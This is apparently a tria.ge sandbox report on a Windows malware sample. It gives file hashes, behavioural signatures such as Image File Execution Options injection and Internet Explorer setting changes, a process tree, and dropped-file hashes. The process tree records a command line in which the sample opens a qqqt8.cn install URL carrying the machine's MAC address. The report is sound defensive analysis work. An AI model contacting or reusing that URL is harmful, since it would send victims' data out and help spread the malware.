Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    08/07/2024, 03:50

General

  • Target

    2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe

  • Size

    45KB

  • MD5

    2ae1676267039c16727bf25f624c51a0

  • SHA1

    e86fdb3e58645365b4472131790c23de0ec56cb1

  • SHA256

    cc91d838372d82e789e05698467ef34d6491d5b6fcf3450a3a16668068374394

  • SHA512

    64339d1c89e8f91b088d94d367aa45afa2cb7af429262301e39b065c6b3faca5044fc709ba8aaa5cc169891d75caf78b574c5f370fe7333519bfb237e91331ac

  • SSDEEP

    768:rMVvp3w/ZKldEsWiZ0ggt4rbRtoDLtpehEX8bJrcnwSKQdd6Mr2SWxb/zrFJnlQp:rMVvp3w/4SsWs3rsDLtpsJ1XQPrijMko

Score
8/10

Malware Config

Signatures

  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 12 IoCs
  • Drops file in Windows directory 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1300
      • C:\Users\Admin\AppData\Local\Temp\2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe
        "C:\Users\Admin\AppData\Local\Temp\2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe"
        2⤵
        • Event Triggered Execution: Image File Execution Options Injection
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2296
        • C:\program files\internet explorer\iexplore.exe
          "C:\program files\internet explorer\iexplore.exe" "http://www.qqqt8.cn/bw/install.asp?ver=081129&tgid=huiqu&address=CE-BD-21-82-E7-35&regk=1&flag=8895437f50e74f5479b26009b0c74aee&frandom=5035"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1368
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1368 CREDAT:275457 /prefetch:2
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:2904
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1368 CREDAT:4142087 /prefetch:2
            4⤵
              PID:2248

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        e0d57d309318d80e9ea156f13043d6a7

        SHA1

        51c613cc1727e7d710d72e975d8499490687501f

        SHA256

        55f1a810337998bff9f78e873cd2658b1e216e137439d3e0e0d61fdec89290e0

        SHA512

        4b7c50c10f3aa6ca007d7c05ecb68b30d2121c9e080ee8279404e6c45744bf63c6abe6a4da4ef87c93323d78e45ca1347eb482abb00f4681573ac9935831cf64

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        6d56eb6b8c3bc6e688a1518aeceb8891

        SHA1

        532e263ce3a0521f69874687435b76e42c96e4e0

        SHA256

        322432ed2bcf6b9f257bce76fabaa32c9434e11fdea3db659c763c6035960fb3

        SHA512

        6517c21fdd466bfdf33d5ab238cab60e5307ea1bcd516adee0eb3e4d35021538146d0a4f2e9d9e04dfa34c4fc6e315e2c287d6525f5fe8e80fbdcf86aeaa01dc

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        09063d3692ace5e7ef4c80426ae95e90

        SHA1

        ed2adec43e291545670e2046742485fc62045e22

        SHA256

        d65d45b327afb49f6c4d60996bef8f2240e2dd672eb513b37f8e413be19cfb74

        SHA512

        12ddfd9817273be7ae75042763e8e43fe18e2b4df488b2f89588677ab802fbab748b55f4d320c01dca8332a502bba4f4f4a93329a9dc1a49954fcb417710d7ca

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        8579503d312f83c033e03b5621a1313b

        SHA1

        17295269ead1a235612932924ad48e2b0c8037cb

        SHA256

        2b97588ea216cbe1acb7989834181cf89d864256dac730516995099007e4d210

        SHA512

        750738cf2ea6e9f23082758d78b45291308e6a9650392efc26b2b5021764ad025cbb5f591f1e84fadd8a1f6a1e56e6c12b0a5a4e12f55c610ca7011616ffad2b

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        9a0ac6c234c4ba3404298b8be7f17177

        SHA1

        d582cbb41a6e2c8c874e79410700c8a906faa0e5

        SHA256

        cdcfd71e9ad493d55e40c5f2a51fd000dddcc2f1cd798a3561b87c6ec836c6d5

        SHA512

        b17e4dbde539322fc4965049c5bf923f63ea4b252358ccade312411e1df5e90d9d0b935896795b2c072fccd21e596599854d6ba60bce21d7c2414226629c43c7

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        e80075edafd889eb09f73441bfd6b9f2

        SHA1

        d372499f3b57e5ea862b27ee9eb73cc58df48bd8

        SHA256

        a5b0ba292474380e1cf2bafcacb5ab5439821e9e3e4eb66d753e9860819dd2b0

        SHA512

        ae626c51249b0025f299e1285b2d673ee5151a39abcabfeaa6c1a154b0428b1803ad8d2884eb35b5162cd6abcf088884a2682e2dccf23c0a47e3ff01cf67ef88

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        d82b4a047ad5364bbe4c65097d6a11cb

        SHA1

        48a9648d12ddad3766b68c6ffb2ad971c5d61ecb

        SHA256

        3aa00771a2a62daf0e46b575ec3e265c5aebdacfecb67a534247d15ee593baba

        SHA512

        6ff6e41ec7c0ed10ec156d82ed76b90c892d5b300ae5c4fc97640e7c71c81df64eed5fe66031586bd68d19ceef2a5d8506df65b2b684b97924fa237282d416d5

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        cddff437127d0c6356ce22930a8c7ff3

        SHA1

        e84a110ec9d11ec96ff2ea99e4c6760b6f8f53cf

        SHA256

        c9fd431aca584348966511c351682b477d81d3b1c38237c61b9eee84ee4f55c5

        SHA512

        ed2624c0e559e854385871bed1675075eb16c0a9e243421c9529b5b21213fd472a932c414374698d2b5e51d656487896dd0c7a168725bcc7f9a57d8a5f66da57

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        a8462c4bbfe8f14b32c43e139fa23fd2

        SHA1

        8a1253aea01789c6980a74d62dec296c9dee64f2

        SHA256

        ccb3d57793283c60c2b3f559534c3eb2262b839e1495f0dc1848423368bf9be7

        SHA512

        0623cf2c9e409cbb671204185c6c609b438ec84d483ea3cd429dbe1f56b73b9d31c947f8911521ca2c76c731ff4d0edf0b76c7db20a443a99dd21bc7cf465937

      • C:\Users\Admin\AppData\Local\Temp\Cab68B5.tmp

        Filesize

        70KB

        MD5

        49aebf8cbd62d92ac215b2923fb1b9f5

        SHA1

        1723be06719828dda65ad804298d0431f6aff976

        SHA256

        b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

        SHA512

        bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      • C:\Users\Admin\AppData\Local\Temp\Tar6954.tmp

        Filesize

        181KB

        MD5

        4ea6026cf93ec6338144661bf1202cd1

        SHA1

        a1dec9044f750ad887935a01430bf49322fbdcb7

        SHA256

        8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

        SHA512

        6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

      • C:\Users\Admin\AppData\Local\Temp\~DF0116BF7196680F80.TMP

        Filesize

        16KB

        MD5

        c81638cbafbedae275a900b540b80656

        SHA1

        dcd195f08c84c4629e7c01d4eeacad8170a51ca2

        SHA256

        058965f656f41cc7dcb273e7693a9ffe0a12bf7fdb2221d756647f2ce967eb21

        SHA512

        aa1123beff378cd5cc00371cd229ebbc28081da410f76cc42fb4b97d388996f078f5f4cdfb9a4991c36dc1c473d50ff75e4d5c8b6c654cdfa2d57097d4ff9d85

      • memory/1300-156-0x0000000002220000-0x0000000002221000-memory.dmp

        Filesize

        4KB

      • memory/1300-158-0x0000000002220000-0x0000000002221000-memory.dmp

        Filesize

        4KB